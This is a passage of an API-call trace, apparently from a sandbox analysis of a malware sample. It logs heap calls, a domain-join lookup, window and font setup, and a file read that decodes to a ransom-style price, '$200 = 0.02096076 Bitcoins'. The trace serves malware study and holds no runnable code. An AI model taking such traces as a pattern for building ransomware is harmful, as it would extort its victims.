| out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0259.285] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x16) returned 0xcec9b8 [0259.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0xcec9b8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetGetJoinInformation", lpUsedDefaultChar=0x0) returned 22 [0259.285] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc930 | out: hHeap=0xbc0000) returned 1 [0259.285] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1ff28 [0259.285] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcec9b8 | out: hHeap=0xbc0000) returned 1 [0259.285] GetProcAddress (hModule=0x744a0000, lpProcName="NetGetJoinInformation") returned 0x74462c3f [0259.285] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1ff28 | out: hHeap=0xbc0000) returned 1 [0259.286] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c68 | out: hHeap=0xbc0000) returned 1 [0259.286] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1ff28 [0259.286] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c68 [0259.286] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ca8 [0259.286] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c58 [0259.286] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20002) returned 0xe64ec8 [0259.286] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c68 | out: hHeap=0xbc0000) returned 1 [0259.286] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ca8 | out: hHeap=0xbc0000) returned 1 [0259.286] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c58 | out: hHeap=0xbc0000) returned 1 [0259.286] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1ff28 | out: hHeap=0xbc0000) returned 1 [0259.286] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x7dee00, BufferType=0x7dee18 | out: lpNameBuffer=0x7dee00*="WORKGROUP", BufferType=0x7dee18) returned 0x0 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ca8 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x214) returned 0xc073f0 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc900 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda3b0 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc8b8 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc8d0 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c48 [0259.289] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc8d0 | out: hHeap=0xbc0000) returned 1 [0259.289] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c48 | out: hHeap=0xbc0000) returned 1 [0259.289] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc8b8 | out: hHeap=0xbc0000) returned 1 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc8b8 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc8d0 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda380 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c48 [0259.289] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe64ec8 | out: hHeap=0xbc0000) returned 1 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc888 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc8a0 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda350 [0259.289] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c38 [0259.290] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda350 | out: hHeap=0xbc0000) returned 1 [0259.290] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c38 | out: hHeap=0xbc0000) returned 1 [0259.290] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc8a0 | out: hHeap=0xbc0000) returned 1 [0259.290] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc8a0 [0259.290] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda350 [0259.290] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc858 [0259.290] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c38 [0259.290] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc858 | out: hHeap=0xbc0000) returned 1 [0259.290] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c38 | out: hHeap=0xbc0000) returned 1 [0259.290] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda350 | out: hHeap=0xbc0000) returned 1 [0259.290] FreeLibrary (hLibModule=0x744a0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c98 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c88 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c78 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fed8 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca38 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda620 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb58 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb40 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb28 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcaf8 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda5f0 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda5c0 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb10 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcae0 | out: hHeap=0xbc0000) returned 1 [0259.329] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcac8 | out: hHeap=0xbc0000) returned 1 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca98 | out: hHeap=0xbc0000) returned 1 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda590 | out: hHeap=0xbc0000) returned 1 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda560 | out: hHeap=0xbc0000) returned 1 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcab0 | out: hHeap=0xbc0000) returned 1 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca80 | out: hHeap=0xbc0000) returned 1 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca68 | out: hHeap=0xbc0000) returned 1 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda530 | out: hHeap=0xbc0000) returned 1 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde5588 | out: hHeap=0xbc0000) returned 1 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32068 | out: hHeap=0xbc0000) returned 1 [0259.330] PeekMessageW (in: lpMsg=0x7df464, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df464) returned 1 [0259.330] TranslateMessage (lpMsg=0x7df464) returned 0 [0259.330] DispatchMessageW (lpMsg=0x7df464) returned 0xffffffff [0259.330] GetForegroundWindow () returned 0x100ea [0259.330] GetWindowLongW (hWnd=0x100ea, nIndex=-21) returned 0 [0259.330] PeekMessageW (in: lpMsg=0x7df464, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df464) returned 0 [0259.330] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32068 [0259.330] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20a) returned 0xc07618 [0259.330] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32018 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc07618 | out: hHeap=0xbc0000) returned 1 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.330] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32068 | out: hHeap=0xbc0000) returned 1 [0259.330] PeekMessageW (in: lpMsg=0x7df464, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df464) returned 0 [0259.330] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fed8 [0259.330] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda530 [0259.330] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32068 [0259.331] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda530 | out: hHeap=0xbc0000) returned 1 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20068 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda530 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca68 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32018 [0259.331] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca68 | out: hHeap=0xbc0000) returned 1 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32c78 [0259.331] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c78 | out: hHeap=0xbc0000) returned 1 [0259.331] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.331] PeekMessageW (in: lpMsg=0x7df464, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df464) returned 0 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20090 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca68 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32018 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca80 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcab0 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32c78 [0259.331] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcab0 | out: hHeap=0xbc0000) returned 1 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe200b8 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcab0 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32c88 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda560 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32c98 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xe233f8 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c38 [0259.331] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe200e0 [0259.331] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0259.331] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe200e0 | out: hHeap=0xbc0000) returned 1 [0259.332] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c38 | out: hHeap=0xbc0000) returned 1 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe200e0 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xe32c38 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20108 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda590 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32c28 [0259.332] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c28 | out: hHeap=0xbc0000) returned 1 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xddca98 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20130 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcac8 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c28 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcae0 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde5588 [0259.332] PeekMessageW (in: lpMsg=0x7dee14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dee14) returned 0 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20158 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb10 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c18 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda5c0 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda5f0 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32c08 [0259.332] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda5f0 | out: hHeap=0xbc0000) returned 1 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20180 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda5f0 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32bf8 [0259.332] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcaf8 [0259.333] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32bf8 | out: hHeap=0xbc0000) returned 1 [0259.333] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb28 [0259.333] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32bf8 [0259.333] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb40 [0259.333] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32bf8 | out: hHeap=0xbc0000) returned 1 [0259.333] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb58 [0259.333] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32bf8 [0259.333] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda620 [0259.333] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0259.333] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda500 [0259.333] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32be8 [0259.333] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32bd8 [0259.333] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca08 [0259.340] NetApiBufferSize (in: Buffer=0xdeda50, ByteCount=0x7de7b0 | out: ByteCount=0x7de7b0) returned 0x0 [0259.340] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32be8 [0259.340] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x214) returned 0xc07618 [0259.340] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdda2f0 [0259.340] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc7f8 [0259.340] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc810 [0259.340] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda2c0 [0259.340] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32bb8 [0259.342] CharLowerBuffW (in: lpsz="wchar[40]", cchLength=0x9 | out: lpsz="wchar[40]") returned 0x9 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x24) returned 0xded810 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca98 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c98 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb10 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c38 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda5c0 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32be8 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda2f0 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c28 [0259.342] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc978 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c38 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32be8 [0259.342] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc9c0 [0259.350] GetStockObject (i=17) returned 0x18a0025 [0259.350] SendMessageW (hWnd=0x4016a, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x0 [0259.350] GetSysColor (nIndex=18) returned 0x0 [0259.350] GetClientRect (in: hWnd=0x4016a, lpRect=0x7df920 | out: lpRect=0x7df920) returned 1 [0259.350] GetWindowRect (in: hWnd=0x4016a, lpRect=0x7df920 | out: lpRect=0x7df920) returned 1 [0259.350] SetWindowLongW (hWnd=0x4016a, nIndex=-21, dwNewLong=5) returned 0 [0259.350] GetDeviceCaps (hdc=0xd010720, index=90) returned 96 [0259.350] ReleaseDC (hWnd=0x0, hDC=0xd010720) returned 1 [0259.350] CreateFontW (cHeight=-30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0xb10a0617 [0259.350] SendMessageW (hWnd=0x4016a, Msg=0x30, wParam=0xb10a0617, lParam=0x1) returned 0x0 [0259.352] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.352] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df98c | out: lpNewFilePointer=0x0) returned 1 [0259.352] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ca8 [0259.352] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10000) returned 0xe74ed0 [0259.353] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c48 [0259.353] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ca8 | out: hHeap=0xbc0000) returned 1 [0259.353] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df99c | out: lpNewFilePointer=0x0) returned 1 [0259.353] ReadFile (in: hFile=0x628, lpBuffer=0xe64ec8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df9c4, lpOverlapped=0x0 | out: lpBuffer=0xe64ec8*, lpNumberOfBytesRead=0x7df9c4*=0x1a, lpOverlapped=0x0) returned 1 [0259.354] ReadFile (in: hFile=0x628, lpBuffer=0xe64ec8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df9c4, lpOverlapped=0x0 | out: lpBuffer=0xe64ec8*, lpNumberOfBytesRead=0x7df9c4*=0x0, lpOverlapped=0x0) returned 1 [0259.354] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c48 | out: hHeap=0xbc0000) returned 1 [0259.354] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe74ed0 | out: hHeap=0xbc0000) returned 1 [0259.354] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.354] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df9c0 | out: lpNewFilePointer=0x0) returned 1 [0259.354] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.354] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df9c0 | out: lpNewFilePointer=0x0) returned 1 [0259.354] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc810 [0259.354] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c48 [0259.355] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80b8 [0259.355] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ca8 [0259.355] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df9a4 | out: lpNewFilePointer=0x0) returned 1 [0259.355] ReadFile (in: hFile=0x628, lpBuffer=0xe64ec8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df9cc, lpOverlapped=0x0 | out: lpBuffer=0xe64ec8*, lpNumberOfBytesRead=0x7df9cc*=0x1a, lpOverlapped=0x0) returned 1 [0259.355] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49ed0 [0259.355] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd80b8 | out: hHeap=0xbc0000) returned 1 [0259.355] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xe49ed0, cbMultiByte=27, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0259.355] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x36) returned 0xe2bf18 [0259.355] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xe49ed0, cbMultiByte=27, lpWideCharStr=0xe2bf18, cchWideChar=27 | out: lpWideCharStr="$200 = 0.02096076 Bitcoins") returned 27 [0259.355] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc810 | out: hHeap=0xbc0000) returned 1 [0259.355] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde54f8 [0259.355] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe2bf18 | out: hHeap=0xbc0000) returned 1 [0259.355] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe49ed0 | out: hHeap=0xbc0000) returned 1 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ca8 | out: hHeap=0xbc0000) returned 1 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8028 | out: hHeap=0xbc0000) returned 1 [0259.356] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde5540 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde54f8 | out: hHeap=0xbc0000) returned 1 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c48 | out: hHeap=0xbc0000) returned 1 [0259.356] CloseHandle (hObject=0x628) returned 1 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcae0 | out: hHeap=0xbc0000) returned 1 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32008 | out: hHeap=0xbc0000) returned 1 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe64ec8 | out: hHeap=0xbc0000) returned 1 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe2bed8 | out: hHeap=0xbc0000) returned 1 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc26d70 | out: hHeap=0xbc0000) returned 1 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fe8 | out: hHeap=0xbc0000) returned 1 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda530 | out: hHeap=0xbc0000) returned 1 [0259.356] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca98 | out: hHeap=0xbc0000) returned 1 [0259.357] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1feb0 | out: hHeap=0xbc0000) returned 1 [0259.357] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c98 | out: hHeap=0xbc0000) returned 1 [0259.357] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 